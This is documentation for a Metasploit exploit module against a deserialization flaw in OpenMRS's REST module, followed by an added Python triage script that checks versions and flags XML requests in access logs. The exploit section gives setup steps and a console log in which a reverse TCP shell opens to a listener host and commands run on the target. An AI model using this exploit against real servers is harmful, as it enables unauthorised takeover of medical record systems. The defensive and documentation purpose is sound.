## Vulnerable Application

OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform for versions below `v2.24.0`. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a REST API endpoint such as `/ws/rest/v1/concept`.

Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).

Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/multi/http/openmrs_deserialization```
4. Do: ```set TARGETURI ```
5. Do: ```set RHOSTS ```
6. Do: ```run```
7. You should get a shell.

## Options

**ForceExploit**

Overrides the check result and runs the exploit.

## Scenarios

### Version of software and OS as applicable

```
msf5 > use exploit/multi/http/openmrs_deserialization
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
rhosts => 192.168.37.168
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
targeturi => /openmrs-standalone
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/openmrs_deserialization) > check
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
msf5 exploit(multi/http/openmrs_deserialization) > run

[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Target is running OpenMRS
[*] Formatting payload
[*] Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wKYK4x9ZOHJ37tm7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

whoami
space
id
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
```
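As an added defender-side example (not part of the Metasploit module or of OpenMRS), the following Python triage checks a reported platform version against the `v2.24.0` fix threshold stated above and flags XML-bodied requests to `/ws/rest/v1/` paths in web server access logs, the delivery vector the text describes. It assumes an Apache-style access log with the request `Content-Type` header appended as a final quoted field; the sample log lines are constructed.

```python
"""Triage helpers for the OpenMRS webservices.rest deserialization issue.
Added example, not code from the module or from OpenMRS. Assumes an
Apache-style access log with the request Content-Type appended as the last
quoted field; the sample lines below are constructed."""
import re

# Fixed in OpenMRS Platform v2.24.0 per the description above.
FIXED_VERSION = (2, 24, 0)

def parse_version(text):
    """Turn '2.1.2' or '2.21' into a three-part tuple for comparison."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable_version(text):
    """True when the reported platform version is below the fixed version."""
    return parse_version(text) < FIXED_VERSION

# Assumed log format: combined log plus a trailing quoted Content-Type field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" "(?P<ctype>[^"]*)"$'
)

# Constructed sample lines: one XML POST to the REST API, one JSON POST, one GET.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Nov/2019:14:13:09 -0600] "POST /openmrs-standalone/ws/rest/v1/concept HTTP/1.1" 500 512 "-" "Mozilla/5.0" "application/xml"
192.0.2.11 - admin [21/Nov/2019:14:15:01 -0600] "POST /openmrs-standalone/ws/rest/v1/concept HTTP/1.1" 201 88 "-" "curl/7.64" "application/json"
192.0.2.12 - - [21/Nov/2019:14:16:22 -0600] "GET /openmrs-standalone/ws/rest/v1/session HTTP/1.1" 200 130 "-" "Mozilla/5.0" "-"
"""

def flag_xml_rest_requests(log_text):
    """Return one dict per request that delivered an XML body to /ws/rest/v1/.
    OpenMRS REST clients normally send JSON, so XML bodies on these paths are
    worth a closer look; 'unauthenticated' is True when no user was logged."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] not in ("POST", "PUT"):
            continue
        if "/ws/rest/v1/" not in m["path"] or "xml" not in m["ctype"].lower():
            continue
        hits.append({"ip": m["ip"], "path": m["path"], "status": m["status"],
                     "unauthenticated": m["user"] == "-"})
    return hits

if __name__ == "__main__":
    print(is_vulnerable_version("2.1.2"), flag_xml_rest_requests(SAMPLE_LOG))
```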